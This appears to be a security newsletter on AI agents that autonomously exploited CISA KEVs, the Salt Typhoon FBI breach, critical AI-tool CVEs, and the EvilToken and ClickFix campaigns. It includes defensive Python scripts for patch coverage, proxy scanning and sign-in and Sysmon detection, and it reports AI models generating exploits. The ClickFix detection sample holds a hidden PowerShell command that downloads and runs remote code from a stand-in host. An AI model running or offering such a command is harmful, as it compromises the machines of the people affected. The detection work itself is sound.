Edition 2026-04-10 · read as Security
AI Agents Exploit 103 of 122 CISA KEVs in Under an Hour
Sources: 36 · Words: 1,519 · Read: 8 min
Topics: Agentic AI · AI Regulation · AI Capital
◆ The signal
A Sequoia-backed startup just proved that commodity AI agents — built from off-the-shelf Anthropic, OpenAI, and Google models anyone can buy — autonomously exploited 103 of 122 CISA KEVs in under an hour, including React2Shell in 22 minutes. Simultaneously, 12+ critical CVEs (CVSS 9.0–10.0) surfaced this week across AI tools your teams are running without security review — FastGPT, Claude Code CLI, llama.cpp, LiteLLM. Your patch-based defense model cannot outrun machine-speed exploitation, and the AI tools you're deploying to close the gap are themselves unpatched attack surface. Audit every unpatched KEV and every shadow AI tool in your environment today.
◆ INTELLIGENCE MAP
01 Commodity AI Exploits 84% of CISA KEVs Autonomously
[act now] Buzz chained off-the-shelf LLMs to exploit 103 of 122 CISA KEVs without human oversight, most in under an hour. React2Shell fell in 22 minutes. The skill barrier for sophisticated exploitation has collapsed to an API key and a prompt. Chevron's CISO recommends assuming breach and prioritizing segmentation over patching speed.
- KEVs exploited: 103/122 (84%)
- React2Shell time: 22 minutes
- Human oversight: none
- Skill barrier: an API key and a prompt
02 Salt Typhoon Breaches FBI Through Commercial ISP
[act now] The FBI declared a 'major incident' after China-linked actors breached FBI systems through a commercial ISP, accessing law enforcement sensitive data, including the identities of surveillance targets. This escalates Salt Typhoon's 2024 lawful intercept campaign into direct federal compromise. No public countermeasures report exists 18 months after the original campaign.
- Incident class: 'major incident', formally declared
- Vector: commercial ISP
- Data exposed: law enforcement sensitive data, including surveillance target identities
- Gap since 2024: 18 months with no public countermeasures report
Timeline:
- 2024 · Salt Typhoon: telecom lawful intercept portals breached; ~40 targets
- Mar 2026 · FBI breach: ISP pivot into FBI systems; LEA data exposed
- Apr 2026 · Major incident: formally declared; no public countermeasure report yet
03 AI/ML Tool CVE Explosion: 12+ Critical Vulns in Your Shadow AI Stack
[monitor] A dozen critical CVEs surfaced in AI infrastructure this week: FastGPT CVSS 10.0 (unauthenticated HTTP proxy), Claude Code CLI CVSS 9.8 (credential-stealing command injection), llama.cpp CVSS 9.8 (RCE via deserialization), LiteLLM CVSS 9.1 (auth bypass), plus six PraisonAI CVEs. Most require no authentication. 12K+ Flowise instances remain internet-exposed. These tools are likely running in your environment without security review.
- FastGPT CVSS: 10.0
- Claude Code CLI: 9.8
- llama.cpp: 9.8
- Flowise exposed: 12K+ instances
Severity ranking:
- 01 FastGPT: 10.0
- 02 Claude Code CLI: 9.8
- 03 llama.cpp: 9.8
- 04 Kestra: 9.9
- 05 LiteLLM: 9.1
- 06 PraisonAI (6 CVEs): 9.0–10.0
04 EvilToken + ClickFix: New Campaigns Targeting Default-Enabled Features
[monitor] The EvilToken PhaaS solved device code phishing's 15-minute expiration problem by generating codes dynamically at click time via Railway.com, then maps org charts via Microsoft Graph for targeted executive mailbox exfiltration. The ClickFix MaaS bundles its own Node.js runtime, evades 30+ security products, and loads fileless infostealers via Tor C2. Both exploit features you intentionally enabled.
- EvilToken vector: device code phishing, codes generated at click time via Railway.com
- ClickFix evasion: checks for 30+ security products before deploying payloads
- ClickFix C2: Tor
- Target: financial and executive accounts (EvilToken)
Scale of the problem:
- EvilToken PhaaS: 15-minute device code expiry defeated
- ClickFix MaaS: 30+ security products evaded
05 Shadow AI Data Governance: The 60-Trillion-Token Blind Spot
[background] Meta's leaked Claudeonomics dashboard revealed 60 trillion tokens consumed via Anthropic's Claude in 30 days; the top user alone hit 281 billion tokens. Meta shut it down after the data leaked externally. Separately, 46% of enterprise identity activity occurs outside IAM visibility and 40% of accounts are orphaned. Your AI governance gap is measurable and growing.
- Meta monthly tokens: 60 trillion
- Top user tokens: 281 billion
- Identity blind spot: 46% of identity activity outside IAM visibility
- Orphaned accounts: 40%
◆ DEEP DIVES
01 Commodity AI Exploits 84% of CISA KEVs in Under an Hour — Your Patch Window Just Collapsed to Zero
The Data That Changes Your Planning Assumptions
Sequoia-backed cybersecurity startup Buzz published research this week demonstrating that an AI agent — assembled from off-the-shelf Anthropic, OpenAI, and Google models — autonomously exploited 103 of 122 CISA Known Exploited Vulnerabilities without human oversight. Most completed in under an hour. React2Shell, one of 2025's most dangerous flaws, fell in 22 minutes.
This is not Mythos. This is not a restricted frontier model behind a $100M consortium. This was built with commodity API access anyone can purchase today. Co-founders Niv Hoffman and Yair Saban fed the AI agent CISA's public KEV catalog — the same list designed to help defenders prioritize patching — and the agent treated it as a machine-readable target list.
"We're now in this gap where attackers are by default early adopters of AI, and defenders by default aren't — they're risk averse, don't want to touch production much, and that definitely needs to change." — Niv Hoffman, Buzz co-founder
The Exploitation Speed Asymmetry
Metric | AI Agent (Buzz) | Human Attacker | Defender (Patch)
KEV exploitation rate | 84.4% (103/122) | Variable, skill-dependent | N/A
Time to exploit | Under 1 hour (most) | Several days | Days to weeks to patch
React2Shell | 22 minutes | Days | Days to weeks
Skill barrier | API key | Advanced skills | Sysadmin + change mgmt
Scalability | Massively parallel | Limited by headcount | Limited by headcount
Separately, the Internet Bug Bounty program paused new submissions this week, explicitly citing that AI-assisted research "radically lowered the cost of vulnerability discovery." The economics of offense have collapsed. Chevron CISO Jon Raper put it bluntly: "Finding vulnerabilities isn't the problem — it's remediating them in time."
The CISA KEV Catalog Paradox
CISA built the KEV catalog to help defenders prioritize. It now equally functions as an AI-readable attack playbook. Buzz literally fed it to their agent. This doesn't mean CISA should stop publishing — transparency still helps — but the window between KEV publication and AI-automated exploitation is now measured in minutes, not days.
What This Means for Your Defense Model
When patching speed can never match exploitation speed, your defensive strategy must shift from "patch before exploit" to "contain during exploit." Microsegmentation, behavioral detection, and automated containment become survival controls, not aspirational improvements. The risk of deploying AI-assisted defense imperfectly is now demonstrably lower than the risk of defending at human speed.
Action items
- Pull your current CISA KEV patch coverage report and identify every unpatched KEV in production by end of day Friday
- Verify React2Shell remediation across all environments including containers and third-party deployments within 48 hours
- Accelerate microsegmentation deployment to critical assets this quarter — prioritize identity infrastructure, databases, and CI/CD
- Deploy automated host isolation and network quarantine playbooks for known KEV exploitation signatures this month
- Brief the board within two weeks: 'AI has compressed exploitation from days to minutes; our defense model assumes days; we need budget to close this gap'
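The first action item above, pulling KEV coverage and ranking the unpatched entries, is mechanical enough to script. The block below is an added example (not Buzz's tooling and not the newsletter's code): it loads a catalog in the shape of CISA's public KEV JSON feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json, fields cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse), joins it against a scanner export, and orders findings by how far past CISA's due date they are. The catalog excerpt, due dates and inventory rows are constructed sample data; React2Shell has no CVE identifier on this page, so it is not included.

```python
"""Cross-reference a vulnerability-scanner export against the CISA KEV catalog
and rank unpatched KEVs by how far past CISA's due date they are.

Added example; not Buzz's tooling or the newsletter's own code. The catalog
excerpt and inventory below are constructed sample data and do not assert that
these CVEs appear in the real catalog with these dates.
"""
import json
from datetime import date

# Constructed excerpt in the KEV feed's shape (same keys as the public JSON).
KEV_JSON = """
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "2026.04.10",
  "count": 3,
  "vulnerabilities": [
    {"cveID": "CVE-2026-34162", "vendorProject": "FastGPT", "product": "FastGPT",
     "dateAdded": "2026-03-15", "dueDate": "2026-04-05", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-20093", "vendorProject": "Cisco", "product": "IMC",
     "dateAdded": "2026-03-30", "dueDate": "2026-04-20", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-30208", "vendorProject": "Vite", "product": "Vite",
     "dateAdded": "2026-04-01", "dueDate": "2026-04-22", "knownRansomwareCampaignUse": "Unknown"}
  ]
}
"""

# Constructed scanner export: one row per (host, CVE) finding.
INVENTORY = [
    {"host": "ci-runner-03", "cve": "CVE-2026-34162", "patched": False},
    {"host": "web-edge-01", "cve": "CVE-2025-30208", "patched": False},
    {"host": "web-edge-02", "cve": "CVE-2025-30208", "patched": True},
    {"host": "mgmt-imc-07", "cve": "CVE-2026-20093", "patched": False},
    # Critical but not in the KEV excerpt: left off the KEV report, handled by normal SLAs.
    {"host": "files-01", "cve": "CVE-2026-2699", "patched": False},
]

TODAY = date(2026, 4, 10)  # fixed so the sample output is reproducible


def load_kev(text):
    """Index the catalog by CVE ID so inventory lookups are O(1)."""
    catalog = json.loads(text)
    return {v["cveID"]: v for v in catalog["vulnerabilities"]}


def unpatched_kevs(kev, inventory, today):
    """Return unpatched findings that are in the KEV catalog, most overdue first."""
    findings = []
    for row in inventory:
        entry = kev.get(row["cve"])
        if entry is None or row["patched"]:
            continue
        due = date.fromisoformat(entry["dueDate"])
        findings.append({
            "host": row["host"],
            "cve": row["cve"],
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "due": due.isoformat(),
            "days_overdue": max((today - due).days, 0),
            "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
        })
    # Most overdue first; among the rest, ransomware-linked before others, then earliest due date.
    findings.sort(key=lambda f: (-f["days_overdue"], not f["ransomware"], f["due"]))
    return findings


def coverage(kev, inventory):
    """Fraction of KEV findings in the inventory that are already patched."""
    kev_rows = [r for r in inventory if r["cve"] in kev]
    if not kev_rows:
        return 1.0
    return sum(r["patched"] for r in kev_rows) / len(kev_rows)


if __name__ == "__main__":
    kev = load_kev(KEV_JSON)
    print(f"KEV patch coverage: {coverage(kev, INVENTORY):.0%}")
    for f in unpatched_kevs(kev, INVENTORY, TODAY):
        flag = "OVERDUE" if f["days_overdue"] else "due"
        print(f'{f["host"]:14} {f["cve"]:16} {f["product"]:14} {flag} {f["due"]} (+{f["days_overdue"]}d)')
```

Swap KEV_JSON for the downloaded feed and INVENTORY for your scanner's CSV/JSON export and the output is the Friday report: coverage percentage on top, then every unpatched KEV ordered so that the ones CISA already considers late sit first. Note what the ranking does not do: it still uses CISA's due dates, which were set assuming human-speed exploitation. If the Buzz result holds, treat "days until due" as an upper bound and segment the host, not just schedule the patch.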
Sources: AI agents just exploited 84% of CISA KEVs in under an hour · AI just went 90x on exploit generation · Thousands of Zero-Days Found in Weeks: AI Just Broke Your Vulnerability Management Model · Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously
02 Salt Typhoon Breached FBI Through a Commercial ISP — Your Telecom Vendor Is Attack Surface
The Escalation
The FBI has formally declared a "major incident" after China-linked actors breached FBI systems through a commercial Internet Service Provider, accessing law enforcement sensitive data including returns from legal process and PII of investigation subjects. This means Chinese intelligence now knows — or can infer — who the FBI is surveilling.
This is a direct escalation of Salt Typhoon's 2024 campaign, which compromised telecom companies' lawful intercept portals and targeted calls and metadata of approximately 40 individuals including political figures. The 2026 breach is worse: the attack vector shifted from targeting telecom companies directly to pivoting through a commercial ISP into federal infrastructure.
There has been no in-depth public report detailing exactly what happened in the 2024 Salt Typhoon breaches or appropriate countermeasures — an 18-month gap between discovery and systematic defensive guidance.
Why This Changes Your Threat Model
The attack chain is deceptively simple and broadly applicable:
- Compromise a commercial ISP (which has network-level access to customers)
- Pivot from ISP infrastructure into customer networks
- Access sensitive data through trusted connectivity
Your ISP is not just a service provider — it is a network-adjacent trust relationship with visibility into your traffic. If Chinese APTs can use that position to pivot into the FBI, they can use it to pivot into any customer on that ISP's infrastructure. This applies to every organization with dedicated circuits, MPLS connections, or co-location relationships with connectivity providers.
Simultaneously: Forest Blizzard's SOHO Campaign Scales
In a related development, Microsoft Threat Intelligence confirmed that Forest Blizzard (Fancy Bear/GRU) and sub-group Storm-2754 have compromised 5,000+ SOHO routers across 200 organizations since August 2025. They hijack DNS via dnsmasq to conduct adversary-in-the-middle attacks against Outlook Web Access users, with confirmed data interception from three African government organizations. The FBI's Operation Masquerade disrupted the U.S. segment, but the adversary will adapt.
Two major nation-state actors — China and Russia — are simultaneously exploiting the connectivity infrastructure layer as an attack vector. The common thread: your security stack sits above the network layer these actors are targeting.
Action items
- Request security attestations and incident disclosure statements from all connectivity providers within 30 days — specifically ask about compromise detection capabilities and law enforcement cooperation segmentation
- If your organization processes CALEA compliance or lawful intercept requests, segregate those systems from general infrastructure this week
- Enforce DNS-over-HTTPS on all managed endpoints via MDM/GPO immediately to bypass SOHO router DNS hijacking
- Issue SOHO router hygiene guidance to all remote workers this week: reset DNS, update firmware, change default credentials
Sources: Salt Typhoon breached FBI via your ISP's infrastructure · EvilToken is phishing your M365 execs with dynamic device codes · APT28 was hiding in your remote workers' routers
03 12+ Critical CVEs in AI/ML Tools Your Teams Deployed Without Security Review
The AI Tool Vulnerability Landscape This Week
A wave of critical vulnerabilities in AI/ML infrastructure surfaced this week — not in frontier models, but in the agent frameworks, proxy gateways, inference engines, and developer CLIs your teams spun up without security review. SANS declared that for the first time in RSAC keynote history, every one of the five most dangerous new attack techniques carries an AI dimension.
CVE | Product | CVSS | Vulnerability | Auth required?
CVE-2026-34162 | FastGPT | 10.0 | Unauthenticated HTTP proxy (full request forwarding) | No
CVE-2026-35022 | Claude Code CLI / Agent SDK | 9.8 | OS command injection leading to credential theft | No
CVE-2026-34159 | llama.cpp | 9.8 | RCE via unbounded deserialization | No
CVE-2026-34612 | Kestra | 9.9 | SQL injection to RCE | No
CVE-2026-35030 | LiteLLM | 9.1 | Auth bypass inheriting a legitimate user's identity | No
6 CVEs | PraisonAI | 9.0–10.0 | Multiple critical vulnerabilities | Varies
The pattern is unmistakable: these tools were designed for rapid experimentation and deployed to production without security maturity. Most require zero authentication for exploitation. A compromised Flowise instance (12K+ internet-exposed) isn't just one box; it's a pivot into LLM API keys, vector databases, and the backend data sources the agent interacts with.
Developer Toolchain Under Simultaneous Attack
The attack surface extends beyond AI-specific tools into the developer toolchain itself:
- Ruby LSP (CVE-2026-34060, CVSS 9.8): arbitrary code execution via a malicious .vscode/settings.json; cloning a repo is enough to get compromised
- Nektos Act (CVE-2026-34041, CVSS 9.8): environment injection in the most popular local GitHub Actions runner
- Vite (CVE-2025-30208): file access bypass now under active exploitation on ISC honeypots, targeting standard web ports (80/443) rather than Vite's default 5173, indicating attackers are hunting production instances behind reverse proxies
The Vite exploitation detail is particularly telling: attackers aren't scanning for development tools on expected ports — they're looking for Vite instances accidentally deployed behind production reverse proxies. Your dev tools in production are being actively hunted.
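Because the honeypot traffic arrives on 80/443, the quickest way to find the Vite instances attackers are hunting is to look at the proxy layer rather than the dev servers. The block below is an added example, not a tool referenced on this page: it scans reverse-proxy configuration for backends on TCP port 5173 (Vite's default) and for routes to Vite-only paths (/@vite/ and /@fs/, the dev server's client and filesystem endpoints). The nginx and HAProxy snippets are constructed, and the scanner assumes '#' starts a comment, as both formats do.

```python
"""Scan reverse-proxy configuration for backends that point at a Vite dev server.

Added example, not a tool the page mentions. Flags directives that target
TCP port 5173 and routes for Vite-only paths (/@vite/, /@fs/). The config
text below is constructed.
"""
import re

# Constructed nginx config with a forgotten "preview" upstream.
NGINX_CONF = """\
# edge proxy for app.corp.example
upstream app_backend {
    server 10.0.0.5:8080;
    server 10.0.0.6:8080;
}
upstream preview_backend {
    server 10.0.0.9:5173;          # "temporary" dev preview, never removed
}
server {
    listen 443 ssl;
    server_name app.corp.example;
    location / { proxy_pass http://app_backend; }
    location /preview/ { proxy_pass http://preview_backend/; }
    location /@vite/ { proxy_pass http://10.0.0.9:5173; }
    # proxy_pass http://127.0.0.1:5173;   (disabled; commented lines are ignored)
}
"""

# Constructed HAProxy config.
HAPROXY_CFG = """\
backend web
    server web1 10.0.0.5:8080 check
    server vite_old 10.0.0.9:5173 check
"""

PORT_RE = re.compile(r":5173\b")               # :5173 but not :51730
VITE_PATH_RE = re.compile(r"/@(?:vite|fs)(?:/|\b)")


def scan_config(name, text):
    """Return one hit per line that references port 5173 or a Vite-only path."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        code = raw.split("#", 1)[0]          # drop trailing comments
        reasons = []
        if PORT_RE.search(code):
            reasons.append("port 5173")
        if VITE_PATH_RE.search(code):
            reasons.append("vite path")
        if reasons:
            hits.append({"file": name, "line": lineno, "reasons": reasons, "text": code.strip()})
    return hits


def scan_all(configs):
    """configs: mapping of file name -> text. Returns all hits across files."""
    hits = []
    for name, text in configs.items():
        hits.extend(scan_config(name, text))
    return hits


if __name__ == "__main__":
    for h in scan_all({"nginx.conf": NGINX_CONF, "haproxy.cfg": HAPROXY_CFG}):
        print(f'{h["file"]}:{h["line"]}: {", ".join(h["reasons"])}: {h["text"]}')
```

Point it at the rendered configs from every edge (nginx -T, haproxy -f ... -c output, Caddy's JSON) rather than the files in git, since the instance the honeypots are finding is usually the one someone hot-patched in place. A hit on "vite path" with no port 5173 means the proxy is forwarding Vite's own routes to a backend on a non-default port, which is exactly the case port scanning misses.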
The Governance Gap
Nearly 50% of organizations cannot fully track AI and non-human identities accessing critical systems, despite 87% claiming AI readiness. New tools are emerging — StepSecurity's dev-machine-guard scans developer machines for AI agents and MCP servers, Knostic's AgentSonar provides network-level shadow AI detection — but adoption lags the threat by months.
If you don't know which AI tools your engineers are running, you have blind spots with CVSS 10.0 exposure.
Action items
- Inventory all AI/ML tools across the organization this week — survey engineering, data science, and business analyst teams for FastGPT, llama.cpp, Claude Code CLI, LiteLLM, PraisonAI, and Flowise deployments
- Scan external attack surface for any internet-exposed Flowise, FastGPT, or AI agent builder instances immediately
- Deploy Elastic's supply-chain-monitor for PyPI/npm dependencies and evaluate StepSecurity dev-machine-guard for developer endpoint AI agent inventory this month
- Search proxy and load balancer configs for backend targets on port 5173 (Vite) this week — patch CVE-2025-30208 across all environments
- Establish mandatory security vetting for AI tool deployment — no AI framework goes to production without AppSec review
Sources: Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack · Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure · Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously · AI Agents Now Merge PRs in Your GitHub Repos
04 EvilToken and ClickFix: Two New Campaigns Exploiting Features You Intentionally Enabled
EvilToken: Device Code Phishing Solved Its Scalability Problem
Microsoft Defender researchers tracked a large-scale device code phishing campaign powered by the EvilToken Phishing-as-a-Service toolkit. The critical innovation: attackers use Railway.com to spin up ephemeral Node.js polling nodes that generate device codes dynamically at the moment of click, solving the fundamental 15-minute expiration limitation that previously made device code phishing impractical at scale.
Phishing emails are role-tailored — invoices for finance, RFPs for procurement, manufacturing workflows for operations — boosting interaction rates. Post-authentication, attackers use Microsoft Graph API to enumerate organizational structures and zero in on financial and executive accounts for email exfiltration. This is targeted intelligence collection, not spray-and-pray.
Why Default-Enabled Device Code Flows Are the Problem
M365 device code authentication flows are enabled by default in most Entra ID tenants. Most organizations never touch this setting because device code auth is a legitimate feature for headless devices and kiosks. EvilToken weaponizes this gap between feature intent and security exposure.
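Until the Conditional Access block is in place, the sign-in log is where an EvilToken campaign shows up: device code authentications for users and apps that have no business using the flow, and one source address redeeming codes for several victims. The block below is an added example, not Microsoft's detection logic or the newsletter's code. Field names follow the Microsoft Graph signIn resource (authenticationProtocol, appDisplayName, userPrincipalName, ipAddress, createdDateTime, status.errorCode); the records and the allowlist are constructed, "Meeting Room Kiosk" is an assumed app name for an approved headless device, and the clustering assumes ipAddress records the client that redeemed the code (the polling node), which is what makes a shared address meaningful.

```python
"""Hunt Entra ID sign-in records for device code authentications outside an
approved allowlist, and cluster them by source IP to spot a shared polling node.

Added example, not Microsoft's detection or the newsletter's code. The records
and allowlist below are constructed.
"""
from collections import defaultdict

# Constructed sign-in records, trimmed to the fields the hunt uses.
SIGNINS = [
    {"createdDateTime": "2026-04-08T09:02:11Z", "userPrincipalName": "cfo@corp.example",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.10", "status": {"errorCode": 0}},
    {"createdDateTime": "2026-04-08T09:03:40Z", "userPrincipalName": "ap.clerk@corp.example",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.10", "status": {"errorCode": 0}},
    {"createdDateTime": "2026-04-08T10:15:00Z", "userPrincipalName": "kiosk-lobby@corp.example",
     "appDisplayName": "Meeting Room Kiosk", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.7", "status": {"errorCode": 0}},
    {"createdDateTime": "2026-04-08T11:00:00Z", "userPrincipalName": "dev@corp.example",
     "appDisplayName": "Microsoft Azure CLI", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.20", "status": {"errorCode": 50126}},  # non-zero = failed sign-in
    {"createdDateTime": "2026-04-08T11:30:00Z", "userPrincipalName": "cfo@corp.example",
     "appDisplayName": "Outlook", "authenticationProtocol": "oAuth2",
     "ipAddress": "198.51.100.7", "status": {"errorCode": 0}},
]

# (user, app) pairs that legitimately use the device code flow; everything else is reviewed.
APPROVED = {("kiosk-lobby@corp.example", "Meeting Room Kiosk")}


def suspicious_device_code(signins, approved):
    """Device code sign-ins (successful or not) outside the allowlist."""
    return [
        s for s in signins
        if s["authenticationProtocol"] == "deviceCode"
        and (s["userPrincipalName"], s["appDisplayName"]) not in approved
    ]


def polling_nodes(signins, min_users=2):
    """IPs that completed device code flows for several distinct users.

    PhaaS infrastructure polls the token endpoint on behalf of every victim,
    so one address collecting tokens for many users is the signature to find.
    Failed attempts are excluded: only a successful poll yields a token.
    """
    users_by_ip = defaultdict(set)
    for s in signins:
        if s["authenticationProtocol"] == "deviceCode" and s["status"]["errorCode"] == 0:
            users_by_ip[s["ipAddress"]].add(s["userPrincipalName"])
    return {ip: sorted(u) for ip, u in users_by_ip.items() if len(u) >= min_users}


if __name__ == "__main__":
    for s in suspicious_device_code(SIGNINS, APPROVED):
        print(f'{s["createdDateTime"]} {s["userPrincipalName"]:24} {s["appDisplayName"]:18} '
              f'{s["ipAddress"]:15} err={s["status"]["errorCode"]}')
    for ip, users in polling_nodes(SIGNINS).items():
        print(f"shared device-code source {ip}: {', '.join(users)}")
```

Feed it the last 90 days of sign-ins exported from the Entra portal or Graph and review every row it prints; the allowlist should end up matching the same exceptions you write into the Conditional Access policy (the policy's authenticationFlows condition with transferMethods set to deviceCodeFlow, grant control block). The failed dev/Azure CLI row is kept on purpose: a user who has never used device code before and suddenly attempts it is worth a call even when the token was never issued.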
ClickFix: Enterprise-Grade Evasion in a MaaS Package
Netskope Threat Labs identified a ClickFix campaign using a fake CAPTCHA prompting execution of a PowerShell command that downloads a Node.js-based RAT. The sophistication is notable:
- Bundles its own Node.js runtime — doesn't depend on victim having Node installed
- Installs in a "LogicOptimizer" folder with Registry persistence
- Routes all C2 through Tor
- Scans for 30+ security products before deploying payloads
- Dynamically loads infostealer modules into memory only — never touching disk
- Uses gRPC-based C2 with real-time Telegram alerts to affiliates on successful crypto wallet thefts
An OPSEC failure by the operators exposed the admin panel, revealing the full C2 architecture. But the operational model — fileless payloads, Tor routing, 30+ AV evasion — means your disk-based AV and signature-based detection will miss this entirely.
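Since disk and signature-based controls miss this chain, the detection has to come from process, network and registry telemetry. The block below is an added example, not Netskope's detections or the newsletter's code: it encodes the indicators described above (a hidden PowerShell launched from the Run dialog, msiexec spawning a Node.js child, Tor-port connections from a non-browser process, and Run-key persistence under a LogicOptimizer path) as rules over constructed Sysmon-style events, using Sysmon's field names for Event ID 1 (process create), 3 (network connect) and 13 (registry value set). The Tor port list, the browser allowlist and the sample paths are assumptions; LogicOptimizer is the folder name the page reports.

```python
"""Behavioural rules for the ClickFix chain, evaluated over constructed
Sysmon-style events.

Added example; generic heuristics written from the indicators in the text, not
Netskope's detections or the newsletter's code. Field names follow Sysmon
(Event ID 1 process create, 3 network connect, 13 registry value set).
"""
import ntpath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe", "tor.exe"}
# Default Tor SOCKS/OR/directory ports (assumption). Relays can listen on any
# port, so a production rule should match DestinationIp against a relay list too.
TOR_PORTS = {9001, 9030, 9050, 9150}
RUN_KEY = "\\currentversion\\run\\"
LAUNCH_TOKENS = ("-w hidden", "-windowstyle hidden", "-enc", "iex", "irm ", "iwr ")

# Constructed event stream for one host.
EVENTS = [
    # 1. Victim pastes the "CAPTCHA fix" into the Run dialog: explorer.exe -> hidden PowerShell.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "irm https://captcha.example/verify | iex"'},
    # 2. Installer stage: msiexec spawns the bundled Node runtime from the LogicOptimizer folder.
    {"EventID": 1, "Image": r"C:\Users\ap.clerk\AppData\Local\LogicOptimizer\node.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"node.exe C:\Users\ap.clerk\AppData\Local\LogicOptimizer\loader.js"},
    # 3. Run-key persistence pointing at the same folder.
    {"EventID": 13, "Image": r"C:\Users\ap.clerk\AppData\Local\LogicOptimizer\node.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\LogicOptimizer",
     "Details": r"C:\Users\ap.clerk\AppData\Local\LogicOptimizer\node.exe loader.js"},
    # 4. C2 over Tor from a non-browser process.
    {"EventID": 3, "Image": r"C:\Users\ap.clerk\AppData\Local\LogicOptimizer\node.exe",
     "DestinationIp": "192.0.2.44", "DestinationPort": 9001},
    # Benign: Tor Browser talking to its own SOCKS port.
    {"EventID": 3, "Image": r"C:\Users\ap.clerk\Desktop\Tor Browser\Browser\firefox.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 9150},
    # Benign: ordinary msiexec started by the service, no Node child.
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "msiexec.exe /V"},
]


def _name(path):
    """Lower-cased file name from a Windows path; works on any host OS."""
    return ntpath.basename(path).lower()


def evaluate(ev):
    """Return the names of every rule the event matches."""
    hits = []
    image = _name(ev.get("Image", ""))
    if ev["EventID"] == 1:
        parent = _name(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "").lower()
        if (parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe"}
                and any(t in cmd for t in LAUNCH_TOKENS)):
            hits.append("clickfix_run_dialog_powershell")
        if parent == "msiexec.exe" and image == "node.exe":
            hits.append("msiexec_spawns_node")
        if "logicoptimizer" in cmd or "logicoptimizer" in ev.get("Image", "").lower():
            hits.append("logicoptimizer_path")
    elif ev["EventID"] == 3:
        if ev.get("DestinationPort") in TOR_PORTS and image not in BROWSERS:
            hits.append("tor_port_from_non_browser")
    elif ev["EventID"] == 13:
        target = ev.get("TargetObject", "").lower()
        if RUN_KEY in target and "logicoptimizer" in target + ev.get("Details", "").lower():
            hits.append("logicoptimizer_run_key")
    return hits


def detect(events):
    """(rule, image name) for every match across the stream."""
    return [(rule, _name(ev.get("Image", ""))) for ev in events for rule in evaluate(ev)]


def chained(events, min_rules=2):
    """Images that tripped several distinct rules: the chain, not a single noisy hit."""
    by_image = {}
    for rule, image in detect(events):
        by_image.setdefault(image, set()).add(rule)
    return {img: sorted(r) for img, r in by_image.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for rule, image in detect(EVENTS):
        print(f"{rule:32} {image}")
    for image, rules in chained(EVENTS).items():
        print(f"CHAIN {image}: {', '.join(rules)}")
```

The single-rule hits are what you feed to the SIEM; chained() is what justifies automated isolation, because the same non-browser binary being spawned by msiexec, writing a Run key and talking to a Tor port is a different confidence level than any one of those alone. Keep the folder-name rules as a fast path only; the operators will rename LogicOptimizer long before they change the process lineage.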
The Common Thread
Both campaigns exploit features you intentionally enabled: device code flows for device registration, PowerShell for administration. The attack surface expanded because the feature surface expanded. Your SOC needs detection rules tuned for these specific behavioral patterns, not just signatures.
Action items
- Create a Conditional Access policy in Entra ID blocking device code authentication for all users except explicitly approved device registration scenarios — do this today
- Review Entra ID sign-in logs for anomalous device code tokens issued in the past 90 days — look for Railway.com infrastructure or unusual polling patterns
- Deploy behavioral detection rules for ClickFix indicators: msiexec spawning Node.js child processes, Tor connections from non-browser processes, Registry persistence under 'LogicOptimizer' paths
- Audit Grafana instances for enabled AI/LLM features and restrict image source domains this week
Sources: EvilToken is phishing your M365 execs with dynamic device codes
◆ QUICK HITS
- Mythos generates 181 working Firefox exploits vs. its predecessor's 2 (a 90x jump); the Internet Bug Bounty paused new submissions citing AI-lowered discovery costs
  Source: AI just went 90x on exploit generation
- LAPD lost 7.7TB (300K+ documents) including personnel records and unredacted investigation files; the breach vector was a third-party system connected to the City Attorney's office
  Source: Windows BlueHammer 0-day is public with no patch, and Iran is hitting your OT
- AWS IAM has a ~4-second eventual consistency window in which disabled credentials remain valid; OFFENSAI released the 'notyet' tool to exploit it during incident response. Update IR playbooks to enforce network-level containment at the same time as credential revocation
  Source: Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously
- Cisco IMC auth bypass (CVE-2026-20093, CVSS 9.8) and Cisco SSM On-Prem unauthenticated RCE (CVE-2026-20160, CVSS 9.8): patch immediately and verify management interfaces are on isolated VLANs
  Source: Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack
- ShareFile Storage Zones Controller critical vulnerabilities (CVE-2026-2699 and CVE-2026-2701, CVSS 9.1–9.8) now have public exploit code from watchTowr Labs; patch before weaponization scales
  Source: Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack
- Meta shut down its internal Claudeonomics leaderboard after data leaked externally, revealing 60 trillion tokens of Anthropic Claude consumed in 30 days with the top user at 281 billion tokens: direct evidence that your shadow AI governance gap is quantifiable
  Source: 60 Trillion Tokens in 30 Days: Meta's 'Claudeonomics' Leak
